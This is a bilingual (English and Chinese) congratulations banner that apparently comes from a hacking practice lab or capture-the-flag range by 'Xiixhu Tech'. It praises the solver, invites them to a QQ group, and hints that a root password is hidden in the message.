____ ____ ____ ____ ____ ____ ____ ____ ____ ____ _
/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \
/_______________________________________________________________\
| |
| *** CONGRATULATIONS! YOU'VE CONQUERED THE TARGET RANGE! *** |
|_______________________________________________________________|

YOU ARE A TRUE HACKER LEGEND!
The Xiixhu Tech bows to your skills!

What's Next?
- Join our elite crew!
- QQ Group: 660930334
- Welcome aboard, mastermind!

Try Harder!
Keep hacking, keep winning!

[ Tip: Root password is hidden in the congrats message! Dig deeper! ]

____ ____ ____ ____ ____ ____ ____ ____ ____ ____ _
/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \
/_______________________________________________________________\
| |
| *** 恭喜!您已征服目标范围! *** |
|_______________________________________________________________|

您是真正的黑客传奇!
Xiixhu Tech为您的技能折服!

接下来是什么?
- 加入我们的精英团队!
- QQ群:660930334
- 欢迎加入,策划大师!

再接再厉!
继续黑客之路,继续赢取胜利!

[ 提示:Root密码隐藏在祝贺信息中!深入挖掘吧! ]